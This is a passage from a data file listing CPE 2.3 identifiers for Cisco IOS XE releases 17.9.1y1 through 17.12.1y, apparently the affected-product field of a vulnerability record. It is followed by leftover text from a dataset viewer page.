"cpe:2.3:o:cisco:ios_xe:17.9.1y1:*:*:*:*:*:*:*",
"cpe:2.3:o:cisco:ios_xe:17.9.2:*:*:*:*:*:*:*",
"cpe:2.3:o:cisco:ios_xe:17.9.2a:*:*:*:*:*:*:*",
"cpe:2.3:o:cisco:ios_xe:17.9.3:*:*:*:*:*:*:*",
"cpe:2.3:o:cisco:ios_xe:17.9.3a:*:*:*:*:*:*:*",
"cpe:2.3:o:cisco:ios_xe:17.9.4:*:*:*:*:*:*:*",
"cpe:2.3:o:cisco:ios_xe:17.9.4a:*:*:*:*:*:*:*",
"cpe:2.3:o:cisco:ios_xe:17.10.1:*:*:*:*:*:*:*",
"cpe:2.3:o:cisco:ios_xe:17.10.1a:*:*:*:*:*:*:*",
"cpe:2.3:o:cisco:ios_xe:17.10.1b:*:*:*:*:*:*:*",
"cpe:2.3:o:cisco:ios_xe:17.11.1:*:*:*:*:*:*:*",
"cpe:2.3:o:cisco:ios_xe:17.11.1a:*:*:*:*:*:*:*",
"cpe:2.3:o:cisco:ios_xe:17.11.99sw:*:*:*:*:*:*:*",
"cpe:2.3:o:cisco:ios_xe:17.12.1:*:*:*:*:*:*:*",
"cpe:2.3:o:cisco:ios_xe:17.12.1a:*:*:*:*:*:*:*",
"cpe:2.3:o:cisco:ios_xe:17.12.1w:*:*:*:*:*:*:*",
"cpe:2.3:o:cisco:ios_xe:17.12.1x:*:*:*:*:*:*:*",
"cpe:2.3:o:cisco:ios_xe:17.12.1y:*:*:*:*:*:*:*"
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.